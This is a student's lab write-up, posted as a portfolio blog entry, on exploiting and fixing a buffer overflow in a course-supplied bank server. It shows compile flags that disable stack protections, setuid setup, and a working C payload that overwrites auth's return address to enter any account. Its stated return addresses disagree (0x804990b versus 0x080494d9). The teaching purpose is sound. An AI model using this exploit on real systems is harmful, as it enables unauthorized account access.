{"id":226,"date":"2022-03-18T22:20:00","date_gmt":"2022-03-18T14:20:00","guid":{"rendered":"https:\/\/philip.twinight.co\/portfolio\/?p=226"},"modified":"2024-03-06T09:52:32","modified_gmt":"2024-03-06T01:52:32","slug":"buffer-overflow-attacks-and-defenses","status":"publish","type":"post","link":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/","title":{"rendered":"Buffer Overflow Attacks and Defenses"},"content":{"rendered":"\n<p>This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=236781290  fetchpriority=\"high\" loading=\"eager\" decoding=\"async\" width=\"1024\" height=\"249\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png\" alt=\"\" class=\"wp-image-230\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:1024\/h:249\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png 1024w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:73\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:187\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-16.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Course Instructor: Dr. 
Jun HUANG<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#Project_Instruction\" >Project Instruction<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#1_Overview\" >1 Overview<\/a><\/li><li class='ez-toc-page-1 
ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#2_The_Bank_ServerClient_Program\" >2 The Bank Server\/Client Program<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#21_bankh\" >2.1 bank.h<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#22_serverc\" >2.2 server.c<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#23_clientc\" >2.3 client.c<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#3_Task_1_Identifying_Buffer_Overflow_Vulnerability\" >3 Task 1: Identifying Buffer Overflow Vulnerability<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#4_Task_2_Remote_Code_Execution_Attack\" >4 Task 2: Remote Code Execution Attack<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#5_Task_3_Control_Flow_Hijacking_Attack\" >5 Task 3: Control Flow Hijacking Attack<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-10\" 
href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#6_Task_4_Fixing_the_Identified_Vulnerability\" >6 Task 4: Fixing the Identified Vulnerability<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#7_Task_5_Containing_Successful_Attacks\" >7 Task 5: Containing Successful Attacks<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Project_Instruction\"><\/span><strong>Project Instruction<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"1_Overview\"><\/span>1 Overview<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary of a buffer. This vulnerability can be used by a malicious user to alter the flow control of the program, leading to the execution of malicious code. The objective of this lab is to gain practical insights into this type of vulnerability, and learn how to exploit the vulnerability in attacks. You will be given a bank server\/ client program with a serious buffer-overflow vulnerability. Your task is to develop schemes to exploit the vulnerability and finally 1) remotely run your malicious code on the server; and 2) redirect the control flow of the server to hack into an arbitrary bank account. 
In addition to the attacks, you will also experiment with several buffer overflow countermeasures and discuss solutions to contain a successful attack.<br>This lab covers the following topics:<br>\u2022 x86 stack layout and calling convention<br>\u2022 Buffer overflow vulnerability and attack<br>\u2022 Address randomization, Non-executable stack, and StackGuard<br>\u2022 Linux privilege and access control of file system<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"2_The_Bank_ServerClient_Program\"><\/span>2 The Bank Server\/Client Program<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>The bank server and client are implemented in server.c, client.c, and bank.h. The server operates on a binary database saved in db.bin. The bank.h defines basic structures and operation interfaces. The server.c works as the entry point of the server: it initializes the server, accepts user connections, authenticates the user, and then starts a request handler for the connected user if authentication is successful. The client.c implements a benign client for your reference. It sends a login request with the correct username and passcode, and then queries account status, changes the passcode, and transfers some money from the instructor\u2019s account to the TA\u2019s account.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"21_bankh\"><\/span>2.1 bank.h<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>The bank.h defines the structure of a bank account, the bank database, and the format of request messages. It<br>also implements interfaces for the client to send different requests, as well as request handlers for the server to process and reply to these requests. Each bank account in db.bin has three fields, including a username defined as an array of 32 chars, a passcode defined as an array of 16 chars, and a balance field defined as an unsigned int. There are a total of 71 accounts. 
Each of you has an account, with your EID as the username and your Student ID as the passcode. Your default balance is 1000. Three account operations have been implemented, including query which allows you to check your account status, changePasscode which allows you to change your passcode, and transfer which allows you to transfer money to another account. Before performing these operations, the user must provide the correct username and passcode in order to log in to the account. <\/p>\n\n\n\n<p>You need to know the format\/size of the login message and be aware that the bank accounts are saved in an array. Unless otherwise stated, it is not necessary to understand other code in this file.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"22_serverc\"><\/span>2.2 server.c<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>The server.c initializes the server and provides an entry point for connected users. It has two procedures,<br>namely main and auth. You need to analyze all code in this file in detail but do not need to know how<br>procedures invoked by main and auth are implemented, unless otherwise stated.<\/p>\n\n\n\n<p>The main procedure loads the binary database (db.bin) into memory, creates a TCP server, and then starts<br>a loop to accept users\u2019 connections and handle their requests. After a connection is established between<br>the server and the client, the user must provide the correct username and passcode in a ReqLogin<br>message (the format is defined in bank.h) in order to perform subsequent operations (e.g., query, change<br>passcode, and transfer) on the account.<\/p>\n\n\n\n<p>After a user connection is established, main will call auth, which waits for and handles the user\u2019s login<br>request. The auth procedure takes one parameter, i.e., the descriptor of the network connection which is<br>used to receive the user\u2019s message. 
It returns the id of the user (i.e., the index of the user\u2019s account in the<br>account array) to main. For example, the id of the TA\u2019s account (username = zihaowen2, passcode =<br>000000) is 71, because it is the last account in the database. If authentication fails, the auth procedure<br>will return an error code, which is a negative value that indicates the reason for the login failure.<\/p>\n\n\n\n<p>If authentication is successful, a reqHandler procedure will be started to serve the user\u2019s other requests.<br>The reqHandler takes two parameters, including the id of the user returned by auth, and the descriptor<br>of the network connection used to interact with the client.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"23_clientc\"><\/span>2.3 client.c<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>A benign client is implemented in client.c for your reference. It shows you how to construct a login message.<br>After successful login, the client.c starts an interactive command line procedure, in which you can<br>type commands such as query, change 123456 which changes the passcode to 123456, and transfer<br>jhuan9 100 which transfers 100 to jhuan9\u2019s account.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"3_Task_1_Identifying_Buffer_Overflow_Vulnerability\"><\/span>3 Task 1: Identifying Buffer Overflow Vulnerability<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>The auth procedure of server.c has a serious buffer overflow vulnerability. Specifically, the receiveMessage<br>procedure receives a message from the network socket connection and saves it to msg. To facilitate processing,<br>the server will further copy msg into the local variable req so that it can access it based on the<br>structure of ReqLogin. 
Please answer the following questions in the lab report.<\/p>\n\n\n\n<p>Question 1.1: The receiveMessage procedure in auth receives client requests from a network connection specified by the descriptor (i.e., the first parameter). Read the code of receiveMessage in bank.h and study read and memcpy by searching them in Linux man pages (man7.org\/linux\/man-pages\/index.html). In the lab report, please explain how the invocation of memcpy in auth may cause a buffer overflow.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\"><strong>My Answer:<\/strong><\/span><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>We can start from the <strong><em>receiveMessage<\/em><\/strong> function: the <strong><em>read()<\/em><\/strong> call inside it reads up to <strong><em>MSGLEN<\/em><\/strong> bytes from the file descriptor <strong><em>connfd<\/em><\/strong> into the buffer starting at <strong><em>msg<\/em><\/strong> and returns the number of bytes actually received, <strong><em>n<\/em><\/strong>. That number is whatever the client chose to send (anything up to <strong><em>MSGLEN<\/em><\/strong>) and has no relation to the size of the ReqLogin structure. auth then calls <strong><em>memcpy()<\/em><\/strong> to copy <strong><em>n<\/em><\/strong> bytes from the memory area <strong><em>msg<\/em><\/strong> to the memory area <strong><em>req<\/em><\/strong>.<\/li>\n\n\n\n<li><strong><em>memcpy()<\/em><\/strong> performs no bounds check: it takes a length argument and copies exactly that many bytes, whatever the size of the destination is. Nothing in auth (in server.c) compares <strong><em>n<\/em><\/strong> with sizeof(<strong><em>req<\/em><\/strong>) before the call, so the data received from the network is written straight into the stack buffer via <strong><em>memcpy()<\/em><\/strong>.<\/li>\n\n\n\n<li>So whenever <strong><em>n<\/em><\/strong> is larger than sizeof(<strong><em>req<\/em><\/strong>), the extra bytes are written past the end of <strong><em>req<\/em><\/strong> into whatever lies above it in auth\u2019s stack frame (the remaining locals, the saved ebp and the return address). That is the buffer overflow, and the attacker controls both the length and the content of the bytes that spill over.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"4_Task_2_Remote_Code_Execution_Attack\"><\/span>4 Task 2: Remote Code Execution Attack<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Attack goal. In this task, you are required to exploit the buffer overflow vulnerability identified in Task 1 to<br>realize a remote code execution attack. Your objective is to remotely shut down the bank server to make a<br>Denial-of-Service (DoS) attack.<\/p>\n\n\n\n<p>Compilation. To realize remote code execution, you need to turn off the buffer overflow countermeasures of the compiler. In addition to disabling ASLR as described in Section 3, you need to turn off the non-executable stack and StackGuard schemes. To do so, you can compile server.c as follows,<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ gcc -z execstack -fno-stack-protector server.c -o server\n<\/pre><\/div>\n\n\n<p>Making server a privileged program. Shutting down a computer requires a privileged system call. In order to make the server a privileged program, you need to change its owner to root and turn on the Set-UID bit using the following commands.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ sudo chown root server\n$ sudo chmod 4755 server\n<\/pre><\/div>\n\n\n<p>Programming 2.1: Please write a program that can send a bad login request to remotely shut down the server. A template program named attack i.c is available on Canvas. A piece of shellcode for shutting down a computer is provided as an unsigned char array named sh in attack i.c. 
Please complete attack i.c by embedding sh and properly structuring and constructing the content of the bad login request. You can also program in python if you feel more comfortable. However, you may need to write the client socket in python by yourself. If you do so, please name your python source code as attack i.py.<\/p>\n\n\n\n<p>Question 2.1: In the lab report, please describe how you determine the structure and content<br>of the bad login request. Your answer should be clear and provide sufficient explanations.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=1327626771  fetchpriority=\"high\" loading=\"eager\" decoding=\"async\" width=\"865\" height=\"703\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png\" alt=\"\" class=\"wp-image-233\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:865\/h:703\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png 865w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:244\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:624\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-17.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<ol class=\"wp-block-list\">\n<li>First, the payload is declared as an unsigned char array of 128 bytes.<\/li>\n\n\n\n<li>Second comes the return address. We obtain it with gdb from auth\u2019s ebp, as ebp+0x8. For example, if auth\u2019s ebp is 0xbfffefe8, then the return address will be 0xbfffefe8+0x8 = 0xbfffeff0.<\/li>\n\n\n\n<li><strong><em>memcpy()<\/em><\/strong> lets us copy the 4 bytes of the return address into the payload at the offset of the saved return address. We then embed the shellcode in the payload and send it to the server, which makes the program overflow the destination buffer.<\/li>\n\n\n\n<li>Result on the server: it was shut down, and the entire Ubuntu VirtualBox VM crashed as well!<\/li>\n<\/ol>\n\n\n\n<p>Question 2.2: Re-compile the server program without making it a privileged program. Specifically, do not change the owner of server to root after compilation. Meanwhile, do not turn on the Set-UID bit. Repeat the experiment by sending the bad login request again. Write down the output of the server and explain your observation.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>Let\u2019s figure it out by looking at the non-executable stack, the StackGuard scheme, and what a privileged program can do.<\/p>\n\n\n\n<p>First test: do not make the server a privileged program, turn off the stack protector and the non-executable stack countermeasures, and run the attack.<\/p>\n\n\n\n<p>Output Result:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=414446309  loading=\"lazy\" decoding=\"async\" width=\"865\" height=\"527\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png\" alt=\"\" class=\"wp-image-234\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:865\/h:527\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png 865w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:183\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png 300w, 
https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:468\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-18.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Explanation: The first line of the output shows that the connection between my client and the server was reset. I believe the shellcode does not have sufficient privilege to do its work: it cannot broadcast the wall message that announces maintenance and asks users to log out and close all open programs (the message that is supposed to be shown to all logged-in users with a terminal open), because the server is not a privileged program, i.e., it does not run as root. Even though the server does try to run the shellcode that the attacker embedded through the buffer overflow, it cannot perform operations that require root privileges, and a system shutdown definitely needs root or one of the other special permissions (usually handled by polkit and\/or systemd, etc.).<\/p>\n\n\n\n<p>Second test: make the server a privileged program and leave the stack protector and the non-executable stack on, i.e., compile the server without -fno-stack-protector and without -z execstack.<\/p>\n\n\n\n<p>Output Result:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=1170695254  loading=\"lazy\" decoding=\"async\" width=\"865\" height=\"520\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png\" alt=\"\" class=\"wp-image-235\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:865\/h:520\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png 865w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:180\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png 300w, 
https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:462\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-19.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Explanation: With the stack protector enabled (gcc\u2019s default), the compiler adds run-time stack-smashing detection based on a stack canary. A canary value is stored in auth\u2019s frame between the local variables and the saved ebp, so an overflow that reaches the return address has to pass through it. Whenever the value has changed by the time auth is about to return, the check detects the corruption and terminates the program instead of returning, and the shellcode the attacker embedded is never executed.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"5_Task_3_Control_Flow_Hijacking_Attack\"><\/span>5 Task 3: Control Flow Hijacking Attack<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Attack goal. In this task, you are required to exploit the buffer overflow vulnerability identified in Task 1<br>to realize a control flow hijacking attack. Your objective as an attacker is to hack into an arbitrary account<br>specified by a user ID (i.e., the user\u2019s index in the account array of the bank database) without providing the<br>correct username and passcode.<\/p>\n\n\n\n<p>As an important requirement, you must ensure that the server can continue operating normally (i.e., correctly accept and handle legal users\u2019 connections and requests) after the disconnection of the attacker.<\/p>\n\n\n\n<p>Hints. To hack into an arbitrary bank account specified by a given id, you need to redirect the control<br>flow of the server after the call of auth to invoke reqHandler with the correct id (i.e., the index of the victim<br>user\u2019s account in the database array) and connfd (i.e., the network connection descriptor used to interact with<br>the attacker\u2019s client), even if auth returns a negative result. 
The first parameter of reqHandler, i.e., the<br>pointer to the bank database, will not be affected by your stack overflow attack because it is a global variable<br>and is stored in the data segment.<\/p>\n\n\n\n<p>Compilation. Since this attack does not require executing any malicious code on the vulnerable server, you can leave the non-executable stack countermeasure on. However, StackGuard needs to be disabled. To do this, please compile server.c using the following command.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ gcc -fno-stack-protector server.c -o server\n<\/pre><\/div>\n\n\n<p>Question 3.1: In the lab report, please draw the stack frame layout of main and auth before the<br>CPU returns from auth to main after processing a *benign* login request. Clearly label the stack with<br>memory addresses in hex. An example is given on page 13 of Tutorial 04\u2019s slides. Please be reminded<br>again that the starting address of the stack frame you observed in gdb is different from the true address while the server is running. However, the stack frame structure is the same, i.e., only the starting address of the stack frame is different. 
To help you solve this problem, we have added some code to the server program to print out the actual ebp values of main and auth.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=653721120  loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"784\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-20.png\" alt=\"\" class=\"wp-image-236\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:765\/h:784\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-20.png 765w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:293\/h:300\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-20.png 293w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/figure>\n\n\n\n<p>Question 3.2: Please use objdump to disassemble the binary executable of server. You can do<br>this using the following command.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ objdump -D server &gt; server.dump\n<\/pre><\/div>\n\n\n<p>Read the binary instructions of main and auth in server.dump, and then describe in the lab report<br>which instruction address in main should be set as the return point after the call of auth.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>The instruction at address 0x804990b in main should be set as the return point after the call of auth. The return address is the memory address that EIP (the instruction pointer) is loaded with when the function\u2019s ret instruction executes; here it is the address in main at which reqHandler is invoked. 
By overwriting the return address through the buffer overflow, the attacker bypasses the server\u2019s authentication and logs in to the bank directly.<\/p>\n\n\n\n<p>Programming 3.1: Please write a program that can send a bad login request to realize this<br>control flow hijacking attack. A template program named attack ii.c is available on Canvas. Please<br>complete attack ii.c by properly structuring and constructing the content of the bad login request. You<br>can also program in python if you feel more comfortable. However, you may need to write the client socket in python by yourself. If you do so, please name your python source code as attack ii.py.<\/p>\n\n\n\n<p>Question 3.3: Note that as a requirement of a successful attack, you must make sure that the<br>server can continue operating correctly after the disconnection of the attacker. After hacking into an account and disconnecting from the server, please keep the server running and then send a second bad login request with a different target user ID. For example, you can specify the target ID as 70 (i.e., the account of the instructor jhuan9) in the first attempt, and then set it as 71 (i.e., the account of the TA zihaowen2) in the second attempt. Note that the ID of the second attempt must be different from the one in the first attempt. In the lab report, please (1) describe which account you hacked into in the second attempt, is it the target account you specified? 
(2) explain your observation.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-opt-id=1607431031  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"488\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:1024\/h:488\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png\" alt=\"\" class=\"wp-image-237\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:1024\/h:488\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 1024w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:143\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:366\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 768w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:1536\/h:731\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 1536w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:1554\/h:740\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-21.png 1554w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>Programming 3.2: Add a procedure into attack ii.c (or attack ii.py if you program<br>using python) that can correctly structure and construct a bad login request so that the attacker can hack into a specified account in the n-th attempt, where n should be the input parameter of your procedure.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include &quot;bank.h&quot;\n#include &lt;stdbool.h&gt;\n#include &lt;stdint.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;string.h&gt;\n#include &lt;unistd.h&gt;\n\nint main(void)\n{\n\t\/\/ connect to the server\n\tint fd = createClient(&quot;127.0.0.1&quot;);\n\tif (fd &lt; 0) {\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t\/\/ construct the bad login request below and name it payload\n\tunsigned char payload&#x5B;128];\n\tuint32_t ret = 0x080494d9;   \/\/ return point in main, read from server.dump\n\tuint32_t id  = 71;           \/\/ index of the target account (the TA's account)\n\tuint32_t ebp = 0xbffff028;   \/\/ main's real ebp, as printed by the server\n\n\t\/\/ fill the whole buffer first so that no byte is sent uninitialised\n\tmemset(payload, 'A', sizeof(payload));\n\t\/\/ offsets are counted from the start of auth's req buffer (see the stack layout in Question 3.1)\n\tmemcpy(&amp;payload&#x5B;44], &amp;id, 4);   \/\/ id picked up by main for the call to reqHandler\n\tmemcpy(&amp;payload&#x5B;64], &amp;ebp, 4);  \/\/ put main's saved ebp back so the server keeps running afterwards\n\tmemcpy(&amp;payload&#x5B;68], &amp;ret, 4);  \/\/ overwrite auth's return address\n\n\t\/\/ send the payload to the server\n\twrite(fd, payload, sizeof(payload));\n\t\/\/ wait for and receive the server's reply\n\tbool success = receiveReply(fd);\n\tif (success) {\n\t\tcmdlineClient(fd);\n\t}\n\treturn 0;\n}\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"6_Task_4_Fixing_the_Identified_Vulnerability\"><\/span>6 Task 4: Fixing the Identified Vulnerability<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Question 4.1: Please describe in the lab report how to fix the buffer overflow vulnerability in<br>the server program.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>The root cause is that auth copies n bytes, the length returned by read(), into req without ever comparing n with sizeof(req). The fix is to bound the copy: before calling memcpy, check that the received length is exactly sizeof(ReqLogin) (or at least no larger than it) and return a negative error code otherwise, the same way auth 